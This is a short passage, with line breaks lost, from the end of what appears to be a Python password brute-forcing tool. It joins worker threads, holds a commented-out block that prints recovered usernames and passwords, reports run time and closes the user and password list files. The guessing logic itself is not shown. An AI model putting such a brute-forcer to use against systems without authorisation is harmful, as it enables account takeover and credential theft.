"SystemExit") except Exception as error: utils.die("Error while running", error) finally: try: for worker in workers: worker.join() except: pass ############################################ # Get result # ############################################ # try: # credentials = processBruteForcing.actGetResult() # # # check result # if len(credentials) == 0: # utils.printf("Password not found!", "bad") # else: # utils.printf("") # utils.print_table(("Username", "Password"), *credentials) # except: # #utils.printf("\nCan not get result.\n", "bad") # pass utils.printf("\nCompleted. Run time: %0.5s [s]\n" % (time.time() - timeStarting)) ######################################## # Clear resources # ######################################## try: setPasslist.close() except: pass try: setUserlist.close() except: pass sys.exit(0)